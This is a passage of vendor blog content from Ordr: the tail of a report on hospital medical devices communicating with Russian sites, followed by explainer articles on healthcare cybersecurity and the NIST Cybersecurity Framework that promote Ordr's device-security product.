Since a single organization may have multiple units of each device, we aggregated and analyzed device data to highlight the device categories with the most amount of data transmitted to Russian sites. These devices provide critical functions in healthcare environments and are also found in the list above, highlighting device categories receiving the most data from Russian sites.
- Ultrasound Image Management
- EHR Workstation
- Medical Workstation
- PACS Workstation
- EEG Workstation
- Infusion Pump
Categories of Sites Communicating the Most with Medical Devices
Looking at the types of Russian sites communicating with the device data we analyzed, the following shows the distribution of site categories communicating with medical devices. As with the Top Russian Domains by Traffic analysis above, many of these categories may look benign; however, each may have the potential to be used to distribute malware or perform other malicious activities.
Device Types and Reputation Score of Sites
Looking at the reputation score of destination URLs, the following chart highlights device types and the reputation of the Russian sites they communicate with. Sites with a low reputation score (e.g., 10) are determined to be very suspicious with a high probability of being malicious. As an example, these sites could host a Command and Control (C&C) server and a connection could be used to download malware such as ransomware to a device and orchestrate the spread across an environment.
Malicious Russian Site Example
The site counter.yadro.ru is a known malicious site advertisement that has had several reports in the past of downloading malware. The following device types analyzed had frequent transactions with this site.
- Patient Monitor
- PACS Workstation
- EEG Workstation
- Blood Analyzer
Here is a list of the offenders by device type with the number of URLs they are reaching out to.
Cities With the Most Communications
The following analysis highlights the top Russian cities with the most traffic to and from the devices we analyzed. Since attackers commonly use techniques to obscure their details, it is not always easy to determine the exact location of malicious activity. However, by analyzing the site IP address, it can be possible to provide insight and an approximation of the potential location.
Protecting Your Environment
Identifying potentially malicious activity and understanding risk is a critical first step to protecting any environment. Ordr customers regularly generate and review their detailed reports showing devices in their environment that have communicated with Russian sites. That report not only identifies these communications but also provides detailed analysis to help customers understand and address the potential risk in their environments.
Ordr also helps customers eliminate risk by dynamically generating policies for enforcement across their existing security and network infrastructure. Ordr has Integrations with leading firewall vendors and can automatically push policies to limit the sites with which devices are allowed to communicate. Examples might be manufacturer maintenance, software update, and services such as image enhancements for medical imaging.
If a device is already infected and spreading malware, Ordr can quickly push policies to switches or wireless controllers to isolate them and stop the spread of the attack. Ordr can also push proactive zero-trust policies to switches or wireless controllers, allowing only a pre-determined set of devices and flows to and from any medical device.
If you want to learn more about the Ordr solution, the insights we provide to uncover the risk of Russian communications, and how you can improve the security for your connected devices, reach out for a personalized demo.
Pandian Gnanaprakasam
Pandian has more than 20 years of product and engineering leadership experience and is also a serial entrepreneur. Before founding Ordr, he was the Chief Development Officer at Aruba, responsible for all of engineering and product management functions. Aruba, an enterprise mobile wireless company, was acquired by HPE for $3 Billion in March 2015. Before Aruba, Pandian served as the head of engineering for Ciscoâs multi-billion-dollar Wi-Fi business unit and before that as VP of engineering for low-end switching product lines. He graduated with a masterâs degree in Electrical Engineering from IIT, Chennai, India and holds several patents to his credit in various networking technologies.
Interested in Learning More?
Subscribe today to stay informed and get regular updates from Ordr Cloud
Ready to Get Started?
-
Knowledge BaseWhat is Healthcare Cybersecurity?
…the National Institute of Standards and Technology’s (NIST) Framework provides guidance, guidelines, and practices for organizations to reduce their cybersecurity risk. Developed in 2014 and updated in 2018, the framework…
What is Healthcare Cybersecurity?
10Min ReadThe healthcare industry relies on connected devices to deliver patient care, and power hospital operations. These devices â from infusion pumps and MRIs to video cameras and HVAC systems need to be protected from cyberattacks such as ransomware. Additionally, these devices may include protected healthcare information (PHI) that need to be secured.
In order to ensure patient safety and protect all of these devices from abuse and attack, healthcare organizations need a whole hospital cybersecurity strategy. A whole hospital healthcare cybersecurity strategy ensures that every connected medical device and any device that includes data that qualifies as Protected Healthcare Information (PHI) or Personally Identifiable Information (PII) is secured.
As this article explains, the proliferation of connected devices makes it challenging to develop healthcare cybersecurity strategies that address all security requirements related to PHI, and can protect them against attacks to ensure patient safety. But with the right tools and methodologies, organizations can overcome these challenges to ensure they meetâor, even better, surpassâthe minimal data security and privacy mandates that apply to PHI and PII in healthcare.
What is healthcare cybersecurity?
Healthcare cybersecurity measures are the tools and strategies that healthcare organizations use to ensure patient safety and maintain the privacy of sensitive healthcare data. Healthcare cybersecurity ensures that sensitive healthcare data stays restricted, and can only be accessed by parties like a patientâs doctor.
Healthcare cybersecurity protects healthcare organizations from external threats, like ransomware or hackers seeking to steal sensitive personal information to sell on the Dark Web. It also safeguards information against internal threats: these include malicious internal actors like disgruntled employees of a hospital, as well as users who inadvertently place sensitive information at risk. For example, hospital employees who fall prey to phishing schemes could risk hackers gaining access to sensitive patient information.
To deliver complete protection against data security risks, healthcare cybersecurity must be able to enforce data protection requirements over any and all systems used by medical organizations. For example, in a hospital, healthcare cybersecurity tools typically need to protect the following:
- Prescribing systems, which hospital doctors use to generate and manage prescriptions.
- Practice management support systems, which store patient healthcare information.
- Clinical decision support systems, where doctors manage information related to patient care.
- Radiology information systems, which store medical images and radiology data associated with individual patients.
- Internet of Medical Things devices, such as infusion pumps and remote patient monitoring devices, which collect healthcare data from individuals.
- Operational Technology devices, such as HVAC systems and elevator control infrastructure, could impact hospital operations, delay medical procedures, or put patient safety at-risk if compromised.
- Internet of Things devices such as smart speakers and smart screens, which may also collect data that can be associated with individual patients. Plus, attackers may use these devices as an initial threat vector, and use lateral movement to move deeper into a network.
These connected devices are critical to patient safety or empowering hospital operations, have the potential to generate and store PHI or PII, and must be protected against cyber attacks and data exfiltration risks.
In addition to securing diverse types of systems, healthcare cybersecurity must address the needs of multiple stakeholders. Hospital staff members must understand healthcare cybersecurity policies and resources to ensure they manage sensitive data responsibly, and keep abreast of constantly evolving cyber threats. For example, HTM and biomedical teams can leverage insights from healthcare cybersecurity tools to help with their day to day tasks, such as locating medical devices, identifying those with vulnerabilities, and taking advantage of utilization details to better plan patching and maintenance work.
Vendors who supply digital services and resources to healthcare organizations, too, have a role to play in healthcare cybersecurity. They are responsible for following robust cybersecurity practices to protect data that is stored or managed within their systems and devices. The same is true of healthcare security and IT teams, who play the leading role in hardening IT systems that store PHI or PII, as well as in identifying and responding to cybersecurity attacks.
To understand what healthcare cybersecurity looks like in practice across various contexts, letâs look at a few common examples of specific systems and devices that healthcare cybersecurity strategies typically need to cover.
Email
Although you may not think of email as a type of sensitive medical data storage system, the reality is that email inboxes store information like patient data. For that reason, email must be secured in order to meet mandates related to PHI and PII security.
In addition, email can be an attack vector for hackers who distribute malware or execute phishing campaigns via email. For that reason, itâs critical to secure email systems as part of healthcare cybersecurity in order to prevent the theft of private data.
Medical Devices
Itâs common for hospitals and doctorsâ offices to use a variety of medical devices to deliver healthcare. For example, nurses may use medical PC stations to keep track of patient records, or doctors might carry tablets to issue prescriptions.
If malicious actors gain physical access to these devices, they could access sensitive data stored within them or gain unauthorized access to other systems and data in the organization. They may even plant malware to carry out remote attacks later. Healthcare cybersecurity solutions must protect these devices against both types of threats.
Connected IoT devices
In addition to traditional IT devices, a wide variety of connected or smart devices are used across healthcare organizations, like Internet-controlled HVAC sensors and elevator controllers. If these devices arenât properly monitored, secured, and patched as part of a healthcare cybersecurity strategy, they will be compromised.
Legacy systems
A legacy system is any type of system that is no longer supported by its manufacturer, but that is still in use: for example, an operating system that has reached its âend of lifeâ date or an application whose vendor has gone out of business. Updating healthcare technology tends to be a complicated and expensive process. This means that healthcare organizations frequently depend on legacy systems until they find the time or resources to migrate to newer ones.
Legacy systems are vulnerable to attack because they no longer receive security updates or patches. Documentation about maintaining the systems is typically out of date.
Nonetheless, to protect against all potential cyber threats, healthcare cybersecurity tools must be able to protect data stored in legacy systems, even if support from the systemsâ developers is no longer available.
Healthcare cybersecurity threats
For healthcare organizations today, itâs not a question of if they will face cyber attacks, but when. Breaches and attempted breaches against healthcare organizations are at an all-time high. Thatâs largely due to the fact that healthcare data presents such alluring targets for hackers, who encrypt sensitive data and hold it hostage for exorbitant ransoms.
Attackers use a variety of techniques in their efforts to access prized healthcare information. Some of these techniques include:
Malware
Malware is malicious software that gives attackers unauthorized access to systems or information stored on them. Malware enables threat actors to steal credentials, collect data, or gain control of systems in order to move laterally or cause disruption to services.
Ransomware
Ransomware is a special type of malware designed to encrypt data, rendering it unusable to the organization that owns it. After encryption occurs, attackers demand a ransom from the organization in order to decrypt the victimâs files. Unless the targeted organization has proper backups in place, itâs forced to choose between paying the ransom or suffering a major disruption to its operations.
Phishing
Phishing is a cyber attack technique in which threat actors trick users into sharing sensitive information. For instance, they might send emails impersonating IT staff or with malicious links to convince employees to share usernames and passwords. If the phishing attack succeeds, the hackers can then use the sensitive data to gain unauthorized access to systems and exfiltrate data, plant malware, or execute ransomware attacks.
Data exposure
Data exposure occurs when lost laptops, insecure physical systems, or IT breaches make sensitive information accessible to unauthorized parties. Data exposure is not an attack, per se, because itâs not the result of a malicious activity by hackers. But the end resultâthe exposure of sensitive informationâis the same as it would be in the case of conventional cyber attacks.
Insider threats
Insiders, like hospital staff, have legitimate access to various systems. If employees intentionally or accidentally misuse those systems, they place sensitive data at risk. This is especially true if the systems are configured with excess permissions that grant internal users more access than they need.
System vulnerabilities
Unpatched software, out of date software, recalled devices, and banned devices could be subject to system vulnerabilities. Information about vulnerabilities is often published in public databases, recall information is available from manufacturers, and banned devices are available from organizations such as the FDA. Hackers can easily find and exploit these known vulnerabilities and vulnerable devices to plant malware or gain access to vulnerable systems, and place the entire organization at risk.
Healthcare cybersecurity best practices
Although every healthcare organizationâs security risks and requirements are different, there are healthcare cybersecurity best practices that every healthcare organization should follow to mitigate the risk to patient safety and of the misuse of PHI and PII.
Achieve visibility
You canât protect what you canât see. For that reason, maintaining comprehensive and continuously up-to-date visibility across the whole hospital is the first step in healthcare cybersecurity.
Comprehensive visibility means knowing about all assets that are connected to your organizationâs network, the services those assets provide, the data those devices collect, manage or access, and which security safeguards are (or arenât) in place to protect the devices. Visibility also ensures that you are aware of vulnerabilities that place devices, services, and data at risk. This way, you have a complete view of the attack surface and can assess for vulnerabilities and potential risks and monitor for threats.
Perform risk assessments
Risk assessments are systematic evaluations of healthcare cybersecurity vulnerabilities and threats that exist and the level of risk each one poses. Risk assessments may also be used to document measures that organizations have taken to prevent breaches.
Healthcare organizations should perform risk assessments on a regular basisâat least once a year, if not more oftenâas part of their security strategy and may be required to meet compliance requirements or to obtain cyber insurance. Risk assessment procedures should be updated whenever new devices or services are deployed.
Implement security controls
Security controls, meaning tools and procedures that organizations use to harden systems against attack, go a long way toward minimizing healthcare cybersecurity risks. Foundational security control measures include tools such as antivirus software, which can help to prevent malware attacks. Data backup and restoration platforms recover compromised data following a ransomware breach. Data encryption, network firewalls, incident response planning, and multi-factor authentication also help to establish baseline security defenses for healthcare systems.
Connected device security tools and solutions, such as Ordr, are also critical to discover and classify every device in healthcare systems, inspect East-West traffic for malware or communications to a malicious domain, and identify vulnerabilities within devices. In particular, within a healthcare environment, these connected device security tools MUST be designed to operate in a healthcare environment â for example, the discovery and vulnerability identification process cannot impact sensitive medical device operations. Therefore, these devices must offer an âagentless, passiveâ approach to security.
Zero Trust
Many modern healthcare organizations have adopted Zero Trust as a core cybersecurity strategy. With Zero Trust the minimum necessary permissions are put in place to control access to healthcare systems and data and reduce risk. Zero Trust principles can be applied to users, devices, data assets, and services in order to restrict communication and mitigate the risk of abuse.
An example of Zero Trust is the use of network access control (NAC) to control device and user access to the network and services. Another example is network segmentation, sometimes referred to as microsegmentation, a technique that isolates devices on the network and prevents unnecessary communications.
Educate staff
Education such as cybersecurity awareness training ensures that healthcare workers are aware of risk and follow best practices to protect patients, services, and data. Healthcare staff should know how to spot threats, like phishing emails, and to react appropriately. They must also be aware of the risks posed by both external and internal threats.
Staff education is also a means of spreading awareness of legal requirements related to healthcare cybersecurity, such as those imposed by HIPAA, so that workers can do their part to adhere to compliance rules.
Healthcare cybersecurity laws and regulations
HIPAA, or the Health Insurance Portability and Accountability Act, is the best-known of several laws and regulations that governing bodies created to enforce healthcare cybersecurity best practices. Although complying with these mandates is not the only reason why healthcare organizations should protect sensitive data, itâs often a core motivator. This means that a familiarity with healthcare laws and regulations is an important component of healthcare cybersecurity.
HIPAA contains several provisions that impact the security of healthcare data. One, known as the Privacy Rule and defined in 45 CFR Part 160 and Subparts A and E of Part 164, establishes permitted and required uses and disclosures of PHI. It also deems PHI to be individually identifiable, and therefore subject to specific security requirements.
In addition, 45 CFR Part 160 and Part 164, Subparts A and C set forth specific security requirements related to PHI that are stored electronically, since most healthcare data is stored this way today. These requirements are referred to as the HIPAA Security Rule. Finally, HIPAA imposes (in 45 CFR §§ 164.400-414) a Breach Notification Rule that generally requires organizations to notify affected users in the event of a cybersecurity breach involving PHI.
Beyond HIPAA, other legal regulations may apply to healthcare data. For example, 42 CFR Part 2 is a law that protects patient records created by programs that receive federal funding to treat substance use disorders. It establishes very specific and extensive privacy requirements related to PHI in this context.
Additionally, the National Institute of Standards and Technologyâs (NIST) Framework provides guidance, guidelines, and practices for organizations to reduce their cybersecurity risk. Developed in 2014 and updated in 2018, the framework also helps organizations and businesses better manage risk and cybersecurity communications. Overall, the NIST framework gives organizations a common language and systemic methodology for risk management.
The framework itself is made of three components: core, tiers, and profiles. The core helps organizations manage and reduce risks in a way that compliments their current cybersecurity practices. The profiles allows organizations to identify areas where existing processes can be optimized and new processes can be implemented. Finally, the tiers asks organizations to consider how strictly their cybersecurity program will comply with NIST standards.
Likewise, the HHS 405(d) Health Industry Cybersecurity Practices (HICP), which is integrated into the NIST framework, lays out specific guidelines for healthcare cybersecurity standards. According to the HHS, the top threats for cybersecurity are:
- Email phishing
- Ransomware attacks
- Loss or theft of equipment
- Accidental or intentional data loss
- Connected medical device attacks that impact patient safety
Both the NIST framework and the HHS 405(d) operate to protect healthcare agencies and patients.
Protect Your Whole Hospital
Healthcare cybersecurity threats come in many forms and apply to a wide variety of systems. For that reason, healthcare organizations should establish a comprehensive cybersecurity strategy including protections that can defend all of their assetsâranging from conventional IT systems, Internet Medical of Things devices, and unsupported legacy systems to connected facilities devices, Internet of Things devices, and beyondâagainst all types of attacks, risks, and threats. Organizations must also maintain comprehensive visibility across the entire organization including high risk assets and whether they are secure. And they must be aware of specific regulatory mandates and implement protections necessary to comply.
Ordr can help with a whole hospital approach to healthcare cybersecurity. By automatically discovering and accurately classifying all connected devices that healthcare organizations depend on, we maintain a continuously updated inventory to provide comprehensive visibility into healthcare systems, vulnerabilities, and risk. In addition, Ordr can help organizations enforce healthcare cybersecurity best practices based on Zero Trust principals, helping organizations protect critical data and services, meet strict compliance and data privacy mandates and ultimately, ensure patient safety.
Interested in Learning More?
Subscribe today to stay informed and get regular updates from Ordr Cloud
Ready to Get Started?
-
Knowledge BaseAn Inside Look at the NIST Cybersecurity Framework
…the attack method, and the level of complexity in the findings. Ordr’s ability identify the network and physical location of a device can aid in the system restoration process by…
An Inside Look at the NIST Cybersecurity Framework
9Min ReadCybersecurity attacks are an ever present concernâa hydra that spawns new heads after each known head is vanquished. One of those newly spawned nightmares is trying to protect Internet of Things (IoT), Internet of Medical Things (IoMT), and Operational Technology (OT) devices as they become network enabled and part of the bigger cybersecurity picture. This is something that traditional cybersecurity tools arenât built to handle.
These devices are used in many industriesâhealthcare, financial services, transportation, manufacturing, and education, just to name a few. IoT, IoMT, and OT devices, as well as traditional systems and resources, must be protected by a thorough plan. The National Institute of Standards and Technology Cybersecurity Framework (NIST CSF) helps your organization build a solution customized to fit your business and needs.
What is the NIST Cybersecurity Framework?
The NIST Cybersecurity Framework is a technology neutral security structure built upon cutting-edge global standards, existing guidelines, and developed practices that is capable of evolving to meet business requirements and keep up with technological advancement. The NIST Cybersecurity Framework is intended as a complement to an organizationâs existing cybersecurity strategy and risk management plan. It provides the means to continue with current policies and procedures, while also discovering areas of potential improvement, better means of communication, and/or increased industry alignment.
The NIST Cybersecurity Framework Core can be used by any sector with any infrastructure because it is adaptable, flexible, and based on business-driven implementation. The NIST Cybersecurity Framework is a top-ranked structural foundation on which a company can build the cybersecurity program best suited to their unique business profile.
The Core breaks the controls and practices into five service lanes to be addressed concurrently:
- Identify (ID)
- Protect (PR)
- Detect (DE)
- Respond (RS)
- Recover (RC)
Importance of the NIST Cybersecurity Framework
The NIST Cybersecurity Framework is built upon tried-and-true practices, so you can apply proven solutions to real problems by leveraging the framework for guidance. It enhances compliance with industry standards and regulations, as well as helps mitigate vulnerabilities by exposing previously unseen risk.
The framework also aids with zeroing in on a companyâs true risks, increasing both efficiency and resource management. In addition, the NIST Cybersecurity Framework (CSF) refines asset management to ensure the company maintains accurate inventory.
While security teams understand the threat landscape and cybersecurity needs, stakeholders and other company teams donât have this detailed understanding. NIST CSF bridges the gap between IT and business departments by laying a reasonable path that focuses on specific outcomes. The framework enhances conversations with these groups and helps explain why certain actions and resources are necessary to achieve a fully mature cybersecurity solution.
The five core functions of the NIST Cybersecurity Framework allow for a company to start at any point. Whether your company is using cutting edge cybertech or relying on legacy systems, there are benefits to be reaped by employing the framework.
When applying NIST CSF, a practitioner should leverage the framework against a controlset outlined by the NIST publication they are attempting to adhere to. For example, 800-53 rev5 (Security and Privacy Controls for Information Systems and Organizations) are often used as the core set of standards for healthcare organizations as it helps in protection of personally identifiable information (PII). The control spreadsheet outlines a list of controls or control enhancements outlined by the control text column (that is to say, âdo i have this control?â). Often controls are satisfied by technologies you have or need to have in your environment. A solution such as Ordr could help meet the requirements of CM-8 (System Component Inventory) and satisfy PM-5 (System Inventory) requirements. These controls speak directly to the framework.
Letâs take an example for 800-53 mapped to the CSF for ID.AM-1: Physical devices and systems within the organization are inventoried. To satisfy this functional category and subcategory you need controls CM-8 and PM-5. As you see, to satisfy the CSF you need to first decide what publication you would like to adhere to. 800-53 is popular but others may be relevant to your organization and contain similar control maps.
The NIST Cybersecurity Framework Core Elements
The Core framework divides security activities into five high-level functions that include Identify, Protect, Detect, Respond, and Recover. As a whole, these functions provide a company with the means of managing risks by organizing all pertinent information, addressing potential threats, and continuously learning from previous ventures.
1. Identify (ID)
Identify is the NIST Cybersecurity Framework function that brings together business context, critical support functions and resources, and risk management. The goal of Identify is to define the critical business landscape for your organization so adequate protection can be implemented around it. Organizations should also consider all processes, procedures, and policies that revolve around the organizationâs compliance regulation, legal considerations, risk factors, operational requirements, and environment.
This includes the following recommended tasks:
- Establish Asset Management policies and procedures, and identify all physical devices, systems, software platforms, and applications that are IT assets, including their criticality where possible.
- Establish an organization-wide security policy, and address cybersecurity issues/risks via governance and risk management policies and procedures.
- Determine the legal requirements and regulations to be enforced, including privacy requirements or civil liberties, and develop a method for the management of such.
- Identify and document any asset vulnerabilities, and utilize vulnerability and threat information available from information sharing forums and sources.
- Determine and document potential threats from both internal and external threat actors and evaluate threats, vulnerabilities, probabilities, and impacts to determine risks.
- Identify how the organization supports the business environment, including any supply chain roles or critical infrastructure implications.
- Identify constraints, priorities, assumptions, and risk tolerances to develop a supply chain risk management strategy.
Your organization should employ a platform that allows for passive discovery with in-depth details, agentless software tracking, and data flow monitoring. Ideally, this includes support of connected devices such as IoT, IoMT, and OT devices. This platform will be capable of providing relevant information to assist the risk management process, such as risk scores per device. The platform also should be able to identify and manage devices and/or communications that involve regulated data, such as payment card industry (PCI) data or medical information protected by HIPAA such as protected health information (PHI).
Consider a solution that can monitor incidents and risk for both traditional devices and IoT devices. The solution should be able to detect anomalies and network intrusions, as well as bad URL/site connections, with detailed trend analysis. A platform such as Ordr also provides a risk score to assist with prioritization, and should be capable of both scheduled and ad-hoc reporting.
2. Protect (PR)
The Protect function is about safeguarding to prevent, limit, or contain any impacts from potential cybersecurity incidents. Itâs a crucial piece of ensuring the continued delivery of vital services.
This includes the following tasks:
- Manage both credentials and identities for authorized users and devices.
- Manage remote access.
- Use separation of duties and the principle of least privilege to help develop a robust method of access management.
- Protect network integrity, including network segregation where warranted.
- Protect data-at-rest.
- Formally manage assets in the transfer, removal, and disposition stages.
- Implement protections against data leaks.
- Keep the production environment separate from testing and development environments.
- Create and maintain a baseline configuration of IT/OT control systems.
- Implement a system development life cycle (SDLC) to manage systems.
- Develop and implement a vulnerability management plan.
- Control access to assets and systems while keeping in mind the least functionality principle.
- Protect both control networks in communications.
- A key piece of implementing Protective Technology is using a system that can restrict access to IoT and OT devices. Ordrâs offering is capable of tracking said devices and the communication patterns of each system.
A good solution should employ artificial intelligence (AI) that can establish baseline communication behavior and transform the baseline into security policies that are device specific, such as limiting traffic to only approved systems to reduce the IoT/IoMT/OT attack surface. As an example, microsegmentation policy can be created to limit IoT/IoMT/OT device communications such as restricting external communications as well as communications with internal systems not required for normal operations. A security platform such as Ordr can continuously monitor all communication and detect devices trying to connect to malicious sites, unauthorized networks, or receive malicious communications. Such a solution also provides domain separation between environments by creating and enforcing microsegmentation policy. Choose a solution that can track an assetâs SDLC as it relates to cybersecurity.
Another capability to look for in a solution is the ability to integrate security intel feeds as well as integration with a vulnerability management platform. Security intel feeds provide insights into known vulnerabilities and associated risk with the ability to identify impact to your environment. Vulnerability management capabilities will help to ensure that remediation and mitigation tasks can be coordinated and tracked across teams as you look to reduce or eliminate risk. Ordrâs offering is capable of integrating security intel feed data to identify connected devices with known vulnerabilities. The solution also provides native vulnerability management capabilities as well as the ability to integrate with other 3rd party vulnerability management tools.
3. Detect (DE)
Detect is the section of the NIST Cybersecurity Framework that focuses on the development and implementation of capabilities, tasks, and activities required to identify incidents precipitated by a cybersecurity event. This functionality enables the organization to discover cybersecurity incidents quickly and efficiently.
Consider these tasks:
- Establish a baseline of network operations and expected data patterns for systems and users and ensure it stays maintained.
- Analyze all detected events to understand attack methods and intended targets.
- Aggregate and correlate event data from multiple sensors and sources.
- Determine the impact of events.
- Establish incident alert thresholds.
- Monitor the network to detect any potential cybersecurity events.
- Monitor the physical environment to detect potential cybersecurity incidents.
- Use monitoring to detect unauthorized connections, software, devices, or personnel.
- Perform vulnerability scans.
- Communicate event detection information to all appropriate parties.
Choose a platform that provides the ability to detect malicious activity as well as a security dashboard based on a consolidated view of events, which can be further enhanced with criticality and MITRE kill chain step data. Your organization also can benefit from a platform that can provide real-time alerts filtered by security event types so specific staff can be notified, based on the affected asset. A high-quality solution should be capable of detecting and logging device moves, adds, and changes.
Ordr continuously monitors the network and employs intrusion detection capabilities to identify known malicious attack traffic. In addition the solution creates a baseline of normal behavior for each connected device and will detect abnormal deviations. With these capabilities Ordr can identify active threats, attempts to exploit vulnerabilities, and indications of compromise. Your platform should work with security information and event management (SIEM) and IT assessment management (ITAM) products so it can seamlessly integrate with existing workflows and procedures.
4. Respond (RS)
The Respond function of the NIST Cybersecurity Framework revolves around containing the impact of a potential cybersecurity event. It includes development and implementation of necessary activities to take action once a cybersecurity event has been detected.
Such recommended tasks include:
- Develop a response planning process and ensure that itâs executed when an incident is detected.
- Contain and mitigate incidents.
- Mitigate newly identified vulnerabilities and/or document them as accepted risks.
- Develop and manage a communication plan for stakeholders, both internal and external, and law enforcement for when incidents occur.
- Determine the impact of incidents by analyzing how effective the response plan is.
- Implement any revisions to the process based on lessons learned from incidents.
Ordr takes pride in being an ideal solution, as our platform uses automation to accelerate your response to an incident with the ability to create and apply next-generation firewall (NGFW) policies, quarantine VLAN assignment, access control list blocks, session termination, and port shutdown with a single click of a button. Ordr also provides details on the physical and network location for each device in the event that a technician needs to physically remove a device from the network or apply a patch by accessing the device directly.
5. Recover (RC)
The ability to recover from an incident needs to be both timely and effective. The quicker system restoration is performed and operations returned to normal, the less impact the cyber incident has on your organization.
The NIST Cybersecurity Framework recommends these steps:
- Execute and maintain recovery procedures and processes to facilitate system restoration.
- Improve recovery processes and planning by incorporating findings and lessons learned into future solutions.
- Coordinate all restoration tasks with both internal and external parties.
Recovery is highly dependent on the circumstances of the attack, the attack method, and the level of complexity in the findings. Ordrâs ability identify the network and physical location of a device can aid in the system restoration process by enabling staff to quickly locate a device impacted by a cyber event that may need to be updated or reimaged. Ordr can also quickly move a quarantined device back to its normal network environment once upgrades, patches, or other remediation methods have been applied.
Use Ordr to Extend the NIST Cybersecurity Framework Throughout Your Organization
The NIST Cybersecurity Framework uses five specific service lanes that should be handled concurrently. The NIST Cybersecurity Framework is highly effective and can be used by any size organization in any industry.
The Identify function determines the who, what, when, and where of the cybersecurity configuration, while the Protect function employs safeguards and protects critical assets. Once youâve dealt with the Detect function that monitors the network and roots out trouble, the Respond function launches the policies and procedures to combat an active cybersystem attack. Finally, Recovery involves the necessary activities to bring the system back to normal.
Ordr helps organizations extend the NIST Cybersecurity Framework to cover all of your assets, including IoT/IoMT/OT devices. With Ordr, you can rapidly inventory all assets in the domain, automatically classify them based on type and function, and assess each device for risk. It analyzes device communications to learn behaviors and creates device baselines to determine what communications the device requires for normal operations. From this baseline, Ordr can detect malicious activity and create policies to quickly stop active threats and quarantine compromised devices without disrupting the device, network, or enterprise operations. Ordr also uses device baselines to proactively improve protection via microsegmentation to logically segregate devices from non-essential areas.
To learn more about how Ordr aligns to the NIST framework, download this report.
Interested in Learning More?
Subscribe today to stay informed and get regular updates from Ordr Cloud
Ready to Get Started?